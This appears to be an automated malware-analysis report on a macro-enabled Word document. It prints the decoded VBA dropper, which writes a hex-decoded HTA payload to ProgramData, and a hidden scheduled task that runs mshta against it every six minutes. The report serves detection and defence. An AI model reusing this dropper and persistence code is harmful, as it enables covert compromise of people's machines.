Verdict: MALICIOUS
Risk score: 192

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is an Office document containing VBA macros, specifically a Document_Open macro that uses CreateObject and references a LOLBin. The embedded VBA script contains obfuscated code that appears to download and execute a second-stage payload. The presence of a macro-enable lure further supports this malicious intent.
Heuristics (8)

- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): the document contains a VBA project, so VBA macros are present.
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN). Matched lines in script:
  `Set Action = taskDefinition.Actions.Create(0)`
  `Action.Path = "C:\Windows\System32\mshta.exe"`
  `Action.Arguments = "C:\ProgramData\Service\update.hta"`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  `Set fso = CreateObject("Scripting.FileSystemObject")`
  followed by `If Not fso.FolderExists("C:\ProgramData\Service\") Then`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
  `Private Sub Document_Open()`
  followed by `On Error Resume Next`
- Macro/content-enable lure (medium, SE_ENABLE_LURE): the document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7625 bytes | a956a301199868dc6b1d62f8ce1367b19e902d4ede607ccad9607d796346b4d1 | No threats found | likely (carved artifact contains 6 long base64-like blob(s)) |

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Stage 1: assemble a hex-encoded payload string, decode it, and drop it
' to disk as C:\ProgramData\Service\update.hta
Private Sub one()
    x = "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"
    x = x + "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"
    x = x + "6f2a6c265a66393266585a572a46217f7a2177262079475a294657632447522a582a772641572f764726732b5454415a26384754622b7f3262715a797f2a7e266654772a2c7b2b2b737b21572a322a584f4641206338665a58467e21332a6c632a717776665a2f465763326c335420572a382c6646667b325a7162382f632b21312b52262a547b38417f472b7f463254416357474646215733473b76712677477f2a792046792b46322a736c2f54216c476c7358212b712b7654636c54264f2a247f3b26762b712b737b76572a79205846465276465a215a2b217946332a7e2a5871462146792a4677632032337f63463232322b76662479262a5a3830465226307f5247262a7f57767b2a6c3179207152213276462b73577b635a632476792a6f71462126792a214f46326c242a47466232667f41582479732a5a572a465726542a6c2a207f6f5a5a5841572a4625717a633b212c4621577b2a466324477e2a31583276477931637e2a73386f585a6c3238327f73583057477f2a38544657762f2a6c46217f6f2b6371265a7b6c66667976326325385a5a2b214f466f267e26296641637679312a6c632a386658266c476c767f73583057472b2c387b2a5a47712b32215a2b71795a2a476c6f3273582b764663416c732b394752263063322a2b71462025792a46322a32577b5473466232667f"
    x = x + "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"
    x = x + "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"
    x = x + "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"
    On Error Resume Next
    ' Decode two hex characters at a time into one character each
    ' (the manual i = i + 1 makes the loop step by 2)
    For i = 1 To Len(x)
        a = a & Chr("&H" & Mid(x, i, 2))
        i = i + 1
    Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    If Not fso.FolderExists("C:\ProgramData\Service\") Then
        fso.CreateFolder ("C:\ProgramData\Service\")
    End If
    ' Write as .txt first, then rename to .hta
    Set OutPutFile = fso.CreateTextFile("C:\ProgramData\Service\update.txt", True)
    OutPutFile.Write a
    OutPutFile.Close
    If fso.FileExists("C:\ProgramData\Service\update.hta") Then
        fso.DeleteFile ("C:\ProgramData\Service\update.hta")
    End If
    fso.MoveFile "C:\ProgramData\Service\update.txt", "C:\ProgramData\Service\update.hta"
End Sub

' Stage 2: persistence via a hidden scheduled task ("Update Service") that
' launches mshta.exe (the LOLBin flagged above) against the dropped .hta,
' starting now and repeating every 6 minutes
Private Sub two()
    On Error Resume Next
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    Set taskDefinition = service.NewTask(0)
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.Hidden = True
    Set trigger = taskDefinition.triggers.Create(1)
    trigger.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2)
    trigger.Enabled = True
    trigger.Repetition.Interval = "PT6M"
    Set Action = taskDefinition.Actions.Create(0)
    Action.Path = "C:\Windows\System32\mshta.exe"
    Action.Arguments = "C:\ProgramData\Service\update.hta"
    Call service.GetFolder("\").RegisterTaskDefinition("Update Service", taskDefinition, 6, , , 3)
End Sub

' Auto-exec entry point: removes the lure shapes from the document body,
' then runs the dropper and the persistence routine
Private Sub Document_Open()
    On Error Resume Next
    ActiveDocument.Shapes(1).Delete
    ActiveDocument.Shapes(1).Delete
    one
    two
End Sub
```
| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 24064 bytes | 546fe2d096118cbc0ceea04d121638905fbfbec25e764447b06abe4e48384fbd | No threats found | likely (carved artifact contains 7 long base64-like blob(s)) |